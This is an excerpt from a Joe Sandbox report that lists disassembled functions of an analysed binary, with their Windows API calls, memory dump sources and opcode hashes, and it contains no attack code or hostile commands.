                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$Long$MetricsSystem
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2294984445-0
                                                                                                                                • Opcode ID: 5b0ea3c1edc261babdc7a17c585e9b239cc799c5b1a7f36a8f38b3302d03227c
                                                                                                                                • Instruction ID: 820c6e3c331e5ce64775aa13034e6baef03177b99b964eb8525b11a2c377bde2
                                                                                                                                • Opcode Fuzzy Hash: 5b0ea3c1edc261babdc7a17c585e9b239cc799c5b1a7f36a8f38b3302d03227c
                                                                                                                                • Instruction Fuzzy Hash: 4921B072A00215AFCB319F799C48B6977B5FF45374B618726F92AC61E0D3709810EB91
                                                                                                                                Function 00F4CA6D Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F4CA86
                                                                                                                                  • Part of subcall function 00F17E53: _memmove.LIBCMT ref: 00F17EB9
                                                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F4CAB8
                                                                                                                                • __itow.LIBCMT ref: 00F4CAD0
                                                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F4CAF6
                                                                                                                                • __itow.LIBCMT ref: 00F4CB07
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$__itow$_memmove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2983881199-0
                                                                                                                                • Opcode ID: c041a16e900ddbe8d43b9bc43d2ba4590774247d75791038489696188dc0c8d4
                                                                                                                                • Instruction ID: b8b323eb1dec696556a0233eb499f640bff5ab95e007a47cbff0587070e8ac7d
                                                                                                                                • Opcode Fuzzy Hash: c041a16e900ddbe8d43b9bc43d2ba4590774247d75791038489696188dc0c8d4
                                                                                                                                • Instruction Fuzzy Hash: 5C210176B012087BDB60EA688C47FDE7EA9EF89720F002025FD05E7191D6798D45A7E0
                                                                                                                                Function 00F689AD Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • IsWindow.USER32(00000000), ref: 00F689CE
                                                                                                                                • GetForegroundWindow.USER32 ref: 00F689E5
                                                                                                                                • GetDC.USER32(00000000), ref: 00F68A21
                                                                                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 00F68A2D
                                                                                                                                • ReleaseDC.USER32(00000000,00000003), ref: 00F68A68
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4156661090-0
                                                                                                                                • Opcode ID: c5f626fade88c75d62438c382d06e0dad69ca2591c0fd0810863d1b381623458
                                                                                                                                • Instruction ID: 3fe49946b811e93440e774e6ab43be82a9a229490f61e5715822386e3db4fd22
                                                                                                                                • Opcode Fuzzy Hash: c5f626fade88c75d62438c382d06e0dad69ca2591c0fd0810863d1b381623458
                                                                                                                                • Instruction Fuzzy Hash: 9521D575A00204AFDB00EF65DC89BAABBF9EF48341F148479E949D7351CB74AC40EB90
                                                                                                                                Function 00F2B58B Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00F2B5EB
                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 00F2B5FA
                                                                                                                                • BeginPath.GDI32(?), ref: 00F2B611
                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 00F2B63B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3225163088-0
                                                                                                                                • Opcode ID: 6841699f15d1ae2d487521b96d9566eca9ea7180a43a2f24972ebe6ddab4fd78
                                                                                                                                • Instruction ID: 1e337c9a1fe5503d75ca1e2e842022b6eca16a6a462c256696357cb200411514
                                                                                                                                • Opcode Fuzzy Hash: 6841699f15d1ae2d487521b96d9566eca9ea7180a43a2f24972ebe6ddab4fd78
                                                                                                                                • Instruction Fuzzy Hash: D621797190135CBFDB20DF65ED497A97BEAFB10325F24016BE850961A5C3708895FB50
                                                                                                                                Function 00F32E57 Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • __calloc_crt.LIBCMT ref: 00F32E81
                                                                                                                                • CreateThread.KERNEL32(?,?,00F32FB7,00000000,?,?), ref: 00F32EC5
                                                                                                                                • GetLastError.KERNEL32 ref: 00F32ECF
                                                                                                                                • _free.LIBCMT ref: 00F32ED8
                                                                                                                                • __dosmaperr.LIBCMT ref: 00F32EE3
                                                                                                                                  • Part of subcall function 00F3889E: __getptd_noexit.LIBCMT ref: 00F3889E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2664167353-0
                                                                                                                                • Opcode ID: 7e96babb54300d00b6de0aef8975e4a33964047cbe067994d3515df7f25f6899
                                                                                                                                • Instruction ID: f715e44ae345c3099783757ca01fa16789c98fc508b76f701e93ce5aebe7d097
                                                                                                                                • Opcode Fuzzy Hash: 7e96babb54300d00b6de0aef8975e4a33964047cbe067994d3515df7f25f6899
                                                                                                                                • Instruction Fuzzy Hash: 0511C432505706AFDB60BFA9DC42DAF7BA8EF447B0F100529F91486191EF79C841B761
                                                                                                                                Function 00F4B8E7 Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00F4B903
                                                                                                                                • GetLastError.KERNEL32(?,00F4B3CB,?,?,?), ref: 00F4B90D
                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00F4B3CB,?,?,?), ref: 00F4B91C
                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,00F4B3CB), ref: 00F4B923
                                                                                                                                • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00F4B93A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 883493501-0
                                                                                                                                • Opcode ID: 0b4395727d48cc8f6ae96cb52253ca48388eadacea2a96fc41a90e29867d70a1
                                                                                                                                • Instruction ID: a93aef3189b0e69533392542f65aa333c830a676c97968314e06780b536e09b4
                                                                                                                                • Opcode Fuzzy Hash: 0b4395727d48cc8f6ae96cb52253ca48388eadacea2a96fc41a90e29867d70a1
                                                                                                                                • Instruction Fuzzy Hash: 9F011D71601208BFDB115FA5DC88D6B3FADEF8A769B20042AFA45C2150DB71DC80EA60
                                                                                                                                Function 00F58355 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00F58371
                                                                                                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00F5837F
                                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F58387
                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00F58391
                                                                                                                                • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00F583CD
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2833360925-0
                                                                                                                                • Opcode ID: c815919423455ef013403598c097d153d6b8dd287156f3a6fc2f0c89524fd24d
                                                                                                                                • Instruction ID: 46e3097b469280485b9521e0df54ce206de0491885a57fe59ba63d9a868f20ee
                                                                                                                                • Opcode Fuzzy Hash: c815919423455ef013403598c097d153d6b8dd287156f3a6fc2f0c89524fd24d
                                                                                                                                • Instruction Fuzzy Hash: 7F016932C0161DDBDF00AFE4ED49AEEBB78FF08B52F100042EA02B2150CF709559ABA1
                                                                                                                                Function 00F4A857 Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CLSIDFromProgID.COMBASE ref: 00F4A874
                                                                                                                                • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00F4A88F
                                                                                                                                • lstrcmpiW.KERNEL32(?,00000000), ref: 00F4A89D
                                                                                                                                • CoTaskMemFree.COMBASE(00000000), ref: 00F4A8AD
                                                                                                                                • CLSIDFromString.COMBASE(?,?), ref: 00F4A8B9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3897988419-0
                                                                                                                                • Opcode ID: 33278c9bfc92d3195aa14af888686da753c53b32ad18ebd036e5ee4eb0bd513a
                                                                                                                                • Instruction ID: a1863d6e69fbb6878a40b1558893375bc68661f37247c5bf9f2ccf55dafedf15
                                                                                                                                • Opcode Fuzzy Hash: 33278c9bfc92d3195aa14af888686da753c53b32ad18ebd036e5ee4eb0bd513a
                                                                                                                                • Instruction Fuzzy Hash: 49018B76A01208BFDB104F68DC84BAABFADEF443A1F204025BE01D2210E770DD41ABA1
                                                                                                                                Function 00F4B7EF Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F4B806
                                                                                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F4B810
                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F4B81F
                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00F4B826
                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F4B83C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 47921759-0
                                                                                                                                • Opcode ID: c005f47b3488163b18a5402990554a5e7a8abee6152d6cf89d6188881e30e5c6
                                                                                                                                • Instruction ID: 6c75996fd77985533e6e2682cd6e92124951e70077d595f54f5a9de4064e60e5
                                                                                                                                • Opcode Fuzzy Hash: c005f47b3488163b18a5402990554a5e7a8abee6152d6cf89d6188881e30e5c6
                                                                                                                                • Instruction Fuzzy Hash: 4EF04F756012086FEB215FA5EC88E673B6CFF46765F10002AF941C7161DB61D892EA60
                                                                                                                                Function 00F4B78E Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F4B7A5
                                                                                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F4B7AF
                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F4B7BE
                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00F4B7C5
                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F4B7DB
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 47921759-0
                                                                                                                                • Opcode ID: 0aba00e48949c051e2f480d229865ea963ca38849ece3cacda839bd77eba5a35
                                                                                                                                • Instruction ID: abce295b19a33169da39a668d4181a81296cad46e521ebc3c4824687fea29e44
                                                                                                                                • Opcode Fuzzy Hash: 0aba00e48949c051e2f480d229865ea963ca38849ece3cacda839bd77eba5a35
                                                                                                                                • Instruction Fuzzy Hash: 65F04F716412086FEB101FA5EC89E673BACFF86765F20401AF941C7161DB65DC41EA60
                                                                                                                                Function 00F4FA7B Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00F4FA8F
                                                                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00F4FAA6
                                                                                                                                • MessageBeep.USER32(00000000), ref: 00F4FABE
                                                                                                                                • KillTimer.USER32(?,0000040A), ref: 00F4FADA
                                                                                                                                • EndDialog.USER32(?,00000001), ref: 00F4FAF4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3741023627-0
                                                                                                                                • Opcode ID: 0bc991991226a749cfb13903eb81efc7164d9b0c32216b98d6d98490380ace54
                                                                                                                                • Instruction ID: e09a20248a73ad19f11206f271f81c7c9b32cb8793c0b052b2e654633bdb1eda
                                                                                                                                • Opcode Fuzzy Hash: 0bc991991226a749cfb13903eb81efc7164d9b0c32216b98d6d98490380ace54
                                                                                                                                • Instruction Fuzzy Hash: 3701A931900708ABEB21AB15DD4EB967BB8BF00715F18016AB54BA50E0DBF4A948EF51
                                                                                                                                Function 00F2B517 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • EndPath.GDI32(?), ref: 00F2B526
                                                                                                                                • StrokeAndFillPath.GDI32(?,?,00F8F583,00000000,?), ref: 00F2B542
                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 00F2B555
                                                                                                                                • DeleteObject.GDI32 ref: 00F2B568
                                                                                                                                • StrokePath.GDI32(?), ref: 00F2B583
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2625713937-0
                                                                                                                                • Opcode ID: 15132e8cc5b1fd34ce39bcc271137aeef335c30f90409acfe9eae7c6f0066479
                                                                                                                                • Instruction ID: 494fd1098cb0edb4a4ed5297dbef53fc2c77a27cbf9e854170b72bc592ac96b9
                                                                                                                                • Opcode Fuzzy Hash: 15132e8cc5b1fd34ce39bcc271137aeef335c30f90409acfe9eae7c6f0066479
                                                                                                                                • Instruction Fuzzy Hash: C2F0C43110124CABDB159F35ED097683FE6BB01322F288216E8A9491F5C7349996FF10
                                                                                                                                Function 00F5FA15 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00F5FAB2
                                                                                                                                • CoCreateInstance.COMBASE(00F9DA7C,00000000,00000001,00F9D8EC,?), ref: 00F5FACA
                                                                                                                                  • Part of subcall function 00F1CAEE: _memmove.LIBCMT ref: 00F1CB2F
                                                                                                                                • CoUninitialize.COMBASE ref: 00F5FD2D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                                • String ID: .lnk
                                                                                                                                • API String ID: 2683427295-24824748
                                                                                                                                • Opcode ID: 06c611149617dc08f8ca26d2582e72432ce6afc3558112cc9f1892e1829a60aa
                                                                                                                                • Instruction ID: 418dc9edd3c431b9c7018d4fb14021ea5d8dd84c147afe1f711d4929d5d9c3c7
                                                                                                                                • Opcode Fuzzy Hash: 06c611149617dc08f8ca26d2582e72432ce6afc3558112cc9f1892e1829a60aa
